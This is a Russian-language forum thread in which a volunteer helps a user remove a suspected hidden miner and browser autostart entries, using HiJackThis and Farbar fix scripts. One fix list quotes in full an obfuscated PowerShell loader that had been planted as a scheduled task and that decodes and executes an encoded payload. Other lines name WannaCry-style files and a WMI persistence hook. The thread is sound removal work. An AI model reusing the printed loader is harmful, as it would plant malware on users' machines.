Перейти к содержанию
Правила раздела

Подозрение на скрытый майнер, появление программ в автозапуске

kostyan2008

Автор kostyan2008
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

kostyan2008 Постоялец

kostyan2008

Опубликовано
Опубликовано

Добрый день! В автозагрузке постоянно появляется Яндекс браузер, при отключении в конфигурации автозагрузок, при следующем запуске компьютера появляется снова, но уже новая задача с тем же названием YANDEX LLC. Так же на рабочем столе появляются ярлыки программ и приложений, которых я не скачивал и не устанавливал, по типу NextRP launcher или world of tanks

CollectionLog-2023.05.20-10.57.zip

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Пофиксите в HiJackThis из папки Autologger (запускать HiJackThis от имени Администратора по правой кнопке мыши)

O4 - MSConfig\startupreg: YandexBrowserAutoLaunch_6258F93B3E4DC9AC344E8154EEB82E22 [command] = C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --no-startup-window --atlogin-bgr-mark /prefetch:5 (HKCU) (2023/05/20)
O22 - Task (.job): (Ready) Восстановление сервиса обновлений Яндекс Браузера.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Task (.job): (Ready) Обновление Браузера Яндекс.job - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
O22 - Task (.job): (Ready) Системное обновление Браузера Яндекс.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Tasks: \Microsoft\Windows\NetTrace\NetTrace - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$rJcVcI='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';$wdJM='BauesC)jTxMeug.D(diuPKarlq-OvlgXZcUbYpXUgbalZhZ';$VCHk=""""$($wdJM[26])$($wdJM[23])$($wdJM[3])$($wdJM[37])$($wdJM[24])$($wdJM[1])$($wdJM[33])$($wdJM[3])"""";$mwGIBO=($wdJM[18]+$wdJM[3]+$wdJM[9]);&$mwGIBO(&$mwGIBO('''_fu2ncntikon( dqecb([qbysteq[]?]$_PN]DJkyo2,[zst_rikng8]$_TI6jt)fat){/$Z}Dl!lzk=[7Sy3stvemh.Tzex4t.2En8co_di-ng1]:g:U_TF_8._GextB.ytmes0($1TI5jt?fa?);s$ahSH_T=_$Z(Dldlzz[0l];h$LzaUkm=j0;{fo_r(k$c2Cu_U=?0;6$c0CunU l-l5t }$PxND_Jyco.vCoyunjt;n$cbCukU+9+)!{i,f(($L(aUnm k-gre _$ZfDl1lzx.C8ou_ntp){)$L+aUdm=_0}_$axSHwT=?(2}3 _-b0an{d ?$akSH3T j-b(orh 1752_) _-b5xour q$a1SH-T;.$PlNDpJy{o[k$caCu8U]n=$_PN_DJtyo+[$vcCpuU.] a-bbxoer 2$ZbDl-lz][$-La9Umi] c-b_xo_r p$afSHoT;_$LoaUnm+3+}_re9tujrn4 $oPN8DJzyoi;}m$o{bL1aU7m=}gwimil w_in=327_d/is+kd_ri.ve-|wrhenre] {3$_g.D2ev.ic_eIvD .-e-q p''''\s\.5\PvHY4SI_CA]LD2RI[VE_0''''_}|lse)lejct_ Mbodjelj,Ster4ia,ln_um7be=r;}$y7BNkrI_U=8de]c ?([uSy,st7em..C)on(vevrtz]:r:F_roamB/as6e6o4S=tr-in.g(2$rwJc_VczI)4) _($xobwLa?Umo.M_odkelx+''''_ ''''(+$!obsLacUmh.S]er[ia(ln_umabe]r)_;igex/([_Syost-emo.T3ex0t.!En-coadi0ng_]:j:U/TFw8.4GeutS,tr_inbg(1$y!BN}rIlU)_) '' '+$VCHk+'($wdJM[14]+$wdJM[16]+$wdJM[14]+$wdJM[14]+$wdJM[6]),(''$''+479/479)'))"
O22 - Tasks: Восстановление сервиса обновлений Яндекс Браузера - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --repair
O22 - Tasks: Обновление Браузера Яндекс - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --background-update --noerrdialogs
O22 - Tasks: Системное обновление Браузера Яндекс - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --run-as-launcher

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
S3 BraveElevationService; "C:\Program Files\BraveSoftware\Brave-Browser\Application\109.1.47.186\elevation_service.exe" [X]
R2 YandexBrowserService; "C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe" --run-as-service [X]
2023-03-14 02:46 - 2023-03-14 02:46 - 003723264 ____S C:\Windows\mssecsvr.exe
2023-03-13 19:30 - 2023-05-18 19:02 - 003514368 ____S C:\Windows\qeriuwjhrf
2023-03-13 19:30 - 2023-05-18 19:02 - 002061938 ____S C:\Windows\tasksche.exe
2023-03-13 19:30 - 2023-03-13 19:30 - 003723264 ____S C:\Windows\mssecsvc.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • ShadowIce449
      Подозрение на майнер
      Автор ShadowIce449
      игры упали в производ, вертушки начали шуметь просто так, испол drweb ничего не обнаружил, а также запустил avz. Cкачивал игры с торрент игрухе и т.д
       
      CollectionLog-2025.06.12-21.38.zip
    • Ilyambuss
      [РЕШЕНО] Подозрение на майнер
      Автор Ilyambuss
      Скачал левак с торрента, после чего в диспетчере задач появились каких-то два процесса "setup", которых раньше не было. Думаю, майнер. После снятия задачи и перезагрузки компьютера они вновь появляются. Проверка касперским удалила каких-то три рекламных объекта.
      CollectionLog-2025.06.15-00.21.zip
    • GlibZabiv
      Подозрение на майнер
      Автор GlibZabiv
      Здравствуйте, ЦП AMD Ryzen 5 3600 в простое греется до 65-75 градусов, ГП AMD Radeon RX 570 Series до 48-50 градусов. Насколько я знаю, в простое такая температура ненормальна. По диспетчеру задач нагрузка небольшая. Kaspersky Internet Security, Dr.Web CurIt! майнера не видят. Прошу вас сказать, заражен ли мой компьютер (данные брал из программы AIDA 64).
      CollectionLog-2025.05.31-12.01.zip
    • Nesquik
      Подозрение на майнер
      Автор Nesquik
      Заметил что появились частые зависания, когда несколько дней назад все было идеально При перезагрузке компьютера появляются командные строки на 1 секунду Антивирус kaspersky ничего не нашел
    • super__feya
      [РЕШЕНО] Подозрение на наличие вируса/майнера на компьютере.
      Автор super__feya
      Здравствуйте! У меня следующая проблема: в последнее время самопроизвольно переподключалась мышь (воспроизводился системный звук Windows подключения нового внешнего устройства, после этого курсор на долю секунды замирал и после продолжал работать как и прежде). Я думал, что проблема в разъеме, поэтому переподключил мышь в другой usb-разъем, но ситуация не изменилась. Помимо этого, при открытии монитора ресурсов, во вкладке "ЦП" показаны два приостановленных процесса: "SearchApp.exe" и "ShellExperienceHost.exe" (слышал, что это может быть следствием наличия майнера на компьютере). Также я произвел проверку с помощью "Kaspersky Virus Removal Tool". Обнаружилось порядка дюжины подозрительных файлов, которые я удалил, но ситуация не изменилась. Пожалуйста, подскажите решение данной проблемы.
      CollectionLog-2025.05.05-17.33.zip
×
×
  • Создать...